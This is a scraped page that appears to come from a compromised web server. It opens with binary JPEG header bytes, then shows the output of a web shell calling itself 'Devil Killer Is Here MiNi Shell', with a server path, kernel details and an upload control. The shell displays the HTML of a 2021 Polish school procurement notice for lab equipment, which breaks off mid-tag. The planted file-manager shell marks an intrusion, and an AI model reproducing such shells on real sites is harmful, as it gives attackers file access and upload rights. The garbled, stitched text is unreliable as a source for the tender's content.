JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030690401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wyposażenia dla Publicznej Szkoły Podstawowej nr 11 z Oddziałami Integracyjnymi w Dębicy w ramach programu „Laboratoria Przyszłości”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PUBLICZNA SZKOŁA PODSTAWOWA NR 11 Z ODDZIAŁAMI INTEGRACYJNYMI IM. 5 PUŁKU STRZELCÓW KONNYCH ARMII KRAJOWEJ W DĘBICY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 850042842</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szkotnia 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dębica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spi11debica.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spi11debica.com/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wyposażenia dla Publicznej Szkoły Podstawowej nr 11 z Oddziałami Integracyjnymi w Dębicy w ramach programu „Laboratoria Przyszłości”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8ab22a1-5868-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00306904</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00306874/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup wyposażenia dla Publicznej Szkoły Podstawowej nr 11 z Oddziałami Integracyjnymi w Dębicy w ramach programu „Laboratoria Przyszłości”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków (innych niż wskazanych złożenie oferty), zawiadomień oraz przekazywanie<br/>informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na<br/>ePUAP oraz udostępnionego przez miniPortal www.miniportal.uzp.gov.pl (Formularz do komunikacji).<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP, TED lub ID postępowania).<br/>3. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>sekretariat@spi11debica.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Sposób<br/>sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów elektronicznych<br/>oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich<br/>może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.<br/>2.Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na wskazany w<br/>pkt 3 adres e-mail.<br/>3.Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania dokumentów<br/>elektronicznych oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów<br/>dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie<br/>zamówienia.<br/>4. Za datę przekazania wymienionych oświadczeń lub dokumentów przyjmuje się datę i godzinę<br/>zarejestrowania ich na skrzynce ePUAP po stronie zamawiającego lub datę i godzinę wpływu<br/>wiadomości na skrzynkę poczty elektronicznej.<br/>5. W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym<br/>dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym,podpisem zaufanym lub podpisem osobistym.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w niniejszej SWZ.<br/>7. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls rtf ze szczególnym wskazaniem<br/>na .pdf<br/>8. W celu ewentualnej kompresji danych Zamawiający wymaga wykorzystanie jednego z formatów: .zip<br/>7Z.<br/>9. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,<br/>zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format .pdf<br/>i opatrzenie ich podpisem kwalifikowanym PAdES, XAdES (podpis wewnętrzny).<br/>10. Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca<br/>powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>11. Jeśli wykonawca pakuje dokumenty np. w plik ZIP. zalecamy wcześniejsze podpisanie każdego ze<br/>skompresowanych plików.<br/>12. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>13. Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich<br/>podpisem kwalifikowanym/osobistym lub zaufanym. Może to skutkować naruszeniem integralności<br/>plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Twoich danych osobowych jest Publiczna<br/>Szkoła Podstawowa nr 11 z Oddziałami Integracyjnymi w Dębicy <br/>ul. Szkotnia 14 , z siedzibą w Dębicy.<br/>Dorota Daniec ul. Ratuszowa 2, 39-200 Dębica;<br/>Możesz się z nami skontaktować w następujący sposób:<br/>• listownie na adres: ul. Ratuszowa 2, 39-200 Dębica,<br/>• przez e-mail: iod@mzo.edu.pl,,<br/>• telefonicznie : 14/ 68-38-132.<br/>Inspektorem Ochrony Danych jest Dorota Daniec. Inspektor to Osoba, z którą możesz się<br/>kontaktować we wszystkich sprawach dotyczących przetwarzania Twoich danych osobowych oraz<br/>korzystania z przysługujących Ci praw związanych z przetwarzaniem danych. Możesz się z nim<br/>kontaktować w następujący sposób :<br/>- listownie na adres: ul. Ratuszowa 2, 39-200 Dębica,<br/>- przez e-mail: iod@mzo.edu.pl,<br/>- telefonicznie 14/ 68-38-132.<br/>Inspektor będzie przetwarzać Twoje dane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek podania przez Ciebie danych osobowych<br/>bezpośrednio Ciebie dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia<br/>11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1129 ze zm. ), dalej „ustawa<br/>Pzp&#34;, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikających z ustawy Pzp; dane osobowe Wykonawcy i innych osób<br/>podanych w ofercie przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego pn „Zakup wyposażenia dla Publicznej Szkoły Podstawowej nr 11 z Oddziałami Integracyjnymi w Dębicy w ramach programu „Laboratoria Przyszłości”. ” znak SP11-271-7/21<br/>prowadzonym zgodnie z art. 275 pkt. 1 UPzp, zamówienie klasyczne<br/>udzielane w trybie podstawowym , Będziemy przetwarzać Twoje dane osobowe na podstawie art. 6 <br/>ust. 1 lit. C RODO oraz ustawy Pzp. Twoje dane osobowe będą przetwarzane przez Publiczną Szkołę Podstawową nr 11 z Oddziałami Integracyjnymi w Dębicy <br/>ul. Szkotnia 14 przez minimum 5 lat, następnie Archiwum Państwowe po ekspertyzie dokumentów może<br/>podjąć decyzję o ich zniszczeniu lub przekwalifikować na kategorię A i wtedy Twoje dane osobowe<br/>będą przetwarzane przez Publiczną Szkołę Podstawową nr 11 w Dębicy przez 25 lat od stycznia kolejnego roku po<br/>zakończeniu Twojej sprawy a następnie zostaną przekazane do Archiwum Państwowego w Krakowie,<br/>gdzie będą przetwarzane wieczyście.<br/>Twoje dane zostaną udostępnione podmiotom lub osobom, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp, a także podmiotom<br/>upoważnionym na podstawie przepisów prawa. Twoje dane Przysługują Ci następujące prawa<br/>związane z przetwarzaniem danych osobowych :<br/>• na podstawie art. 15 RODO – prawo dostępu do danych osobowych jej dotyczących; przy czym w<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty procedowanego/zakończonego) postępowania;<br/>• na podstawie art. 16 RODO – prawo do sprostowania jej danych osobowych; przy czym skorzystanie<br/>przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w<br/>art. 16 RODO, nie może skutkować zmianą wyniku postępowania, ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp, a także nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>• na podstawie art. 18 RODO – prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych, z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO*; przy czym<br/>wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy ta osoba uzna, że<br/>przetwarzanie jej dotyczących danych osobowych narusza przepisy RODO; W odniesieniu do Twoich<br/>danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO. Aby skorzystać z powyższych praw,<br/>skontaktuj się z Inspektorem Ochrony Danych (dane kontaktowe powyżej).<br/>Wykonawcy i innym osobom podanych w ofercie nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>-na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania tych danych osobowych jest art. 6 ust. 1 lit. c RODO. W przypadku<br/>nieprawidłowości przy przetwarzaniu Twoich danych osobowych, przysługuje Ci także prawo<br/>wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych, tj. Prezesa<br/>Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP11-271-7/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa drukarki 3D z akcesoriami oraz laptopa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która uzyskała największą liczbę punktów w oparciu o ustalone kryteria zostanie uznana na najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa mikrokontrolera z czujnikami i akcesoriami oraz stacji lutowniczej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42661000-7 - Urządzenia do lutowania na miękko i na twardo</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która uzyskała największą liczbę punktów w oparciu o ustalone kryteria zostanie uznana na najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa elementów zestawu podstawowego programu Laboratoria Przyszłości /audio, video, oświetlenie/. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32351000-8 - Akcesoria do sprzętu dźwiękowego i wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32341000-5 - Mikrofony</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta, która uzyskała największą liczbę punktów w oparciu o ustalone kryteria zostanie uznana na najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawę specjalistycznych urządzeń i narzędzi, materiałów edukacyjnych oraz oprogramowania /Gogle Wirtualnej Rzeczywistości (VR) wraz z akcesoriami i oprogramowaniem wspierającym ich funkcjonowanie/ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32322000-6 - Urządzenia multimedialne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 